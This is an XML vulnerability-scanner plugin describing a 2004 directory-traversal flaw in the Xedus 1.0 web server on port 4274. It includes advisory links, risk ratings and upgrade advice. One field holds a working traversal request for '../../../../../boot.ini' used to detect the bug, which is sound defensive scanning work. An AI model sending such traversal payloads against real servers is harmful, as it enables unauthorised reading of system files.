<plugin_id>168</plugin_id>
<plugin_name>Jerod Moemeka Xedus 1.0 Directory Traversal</plugin_name>
<plugin_family>HTTP</plugin_family>
<plugin_created_date>2004/09/08</plugin_created_date>
<plugin_created_name>Marc Ruef</plugin_created_name>
<plugin_created_email>marc dot ruef at computec dot ch</plugin_created_email>
<plugin_created_web>http://www.computec.ch</plugin_created_web>
<plugin_created_company>computec.ch</plugin_created_company>
<plugin_updated_name>Marc Ruef</plugin_updated_name>
<plugin_updated_email>marc dot ruef at computec dot ch</plugin_updated_email>
<plugin_updated_web>http://www.computec.ch</plugin_updated_web>
<plugin_updated_company>computec.ch</plugin_updated_company>
<plugin_updated_date>2004/11/13</plugin_updated_date>
<plugin_version>1.1</plugin_version>
<plugin_changelog>Corrected the plugin structure and added the accuracy values in 1.1</plugin_changelog>
<plugin_protocol>tcp</plugin_protocol>
<plugin_port>4274</plugin_port>
<plugin_procedure_exploit>open|send GET /../../../../../boot.ini HTTP/1.0\n\n|sleep|close|pattern_exists [boot loader]</plugin_procedure_exploit>
<plugin_exploit_accuracy>97</plugin_exploit_accuracy>
<plugin_comment>Check is inspired by the Nessus plugin.</plugin_comment>
<bug_published_name>James Bercegay</bug_published_name>
<bug_published_email>security at gulftech dot org</bug_published_email>
<bug_published_web>http://www.gulftech.org</bug_published_web>
<bug_published_company>GulfTech Security Research Team </bug_published_company>
<bug_published_date>2004/08/30</bug_published_date>
<bug_advisory>http://www.gulftech.org/?node=research&article_id=00047-08302004</bug_advisory>
<bug_affected>Jerod Moemeka Xedus 1.0</bug_affected>
<bug_not_affected>Perhaps Jerod Moemeka Xedus newer than 1.0 or other solutions</bug_not_affected>
<bug_vulnerability_class>Directory Traversal</bug_vulnerability_class>
<bug_description>The remote host is running the Xedus web server which is a part of the peer-to-peer software. There is a bug in this solution which makes it vulnerable to directory traversal attacks. An attacker may use this bug to fetch files from the target system.</bug_description>
<bug_solution>You should install or upgrade the software to the latest version. See http://www.thinxoft.com for more details. Also limit unwanted connections and communications with firewalling if possible.</bug_solution>
<bug_fixing_time>Approx. 1 hour</bug_fixing_time>
<bug_exploit_availability>Yes</bug_exploit_availability>
<bug_exploit_url>http://www.securityfocus.com/bid/11071/exploit/</bug_exploit_url>
<bug_remote>Yes</bug_remote>
<bug_local>Yes</bug_local>
<bug_severity>High</bug_severity>
<bug_popularity>6</bug_popularity>
<bug_simplicity>7</bug_simplicity>
<bug_impact>8</bug_impact>
<bug_risk>7</bug_risk>
<bug_nessus_risk>Medium</bug_nessus_risk>
<bug_check_tool>Nessus is able to do the same check. The possibilities of exploiting this kind of vulnerabilities is well-known and well documented.</bug_check_tool>
<source_securityfocus_bid>11071</source_securityfocus_bid>
<source_nessus_id>14645</source_nessus_id>
<source_literature>Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427</source_literature>
<source_misc>http://www.securityfocus.com/archive/1/373506</source_misc>

